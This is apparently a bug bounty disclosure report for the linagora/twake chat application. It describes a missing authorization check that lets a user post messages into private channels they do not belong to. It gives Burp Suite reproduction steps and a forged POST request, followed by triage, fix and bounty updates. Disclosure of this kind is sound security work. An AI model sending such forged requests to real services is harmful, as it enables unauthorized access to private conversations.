Send any message to any to any private channel in linagora/twake
Valid
Reported on
Jan 1st 2023
Description
A user can add any message to a private channel that is not in that channel. This error is because the web application did not check if the sender userid is in that private channel.
Proof of Concept
Login to website in brower 1 with user A.
Login to website in brower 2 with user B.
User A in brower 1 create private channel. User B in brower 2 capture request send message with burpsuite.
Get User A private channel id, replace it with User B request to send a message on burpsuite.
POST /internal/services/messages/v1/companies/9060b950-89b4-11ed-902d-338d3eb6e868/threads HTTP/1.1
{"resource":{"participants":[{"type":"channel","id":"ddd58469-9c1a-4548-ba28-5ad057522f7f","company_id":"9060b950-89b4-11ed-902d-338d3eb6e868","workspace_id":"9072bab0-89b4-11ed-902d-338d3eb6e868"}]},"options":{"message":{"thread_id":"59c0d1b0-89b8-11ed-81da-e96b2398db85","created_at":1672566039115,"user_id":"eee929d0-89b4-11ed-902d-338d3eb6e868","context":{"_front_id":"59c0d1b1-89b8-11ed-81da-e96b2398db85"},"text":"This is message private","files":[]}}}
Demo: https://drive.google.com/file/d/1eDipnxCFUm6JUtJJHBo8AYM1ofNSnblN/view
Impact
A User can send any message to any to any private channel.
We are processing your report and will contact the
linagora/twake
team within 24 hours.
8 days ago
We have contacted a member of the
linagora/twake
team and are waiting to hear back
7 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Thanks, we are working on a fix today
Kevin Kien
has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Romaric Mourgues
has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on
Jan 7th 2023
to join this conversation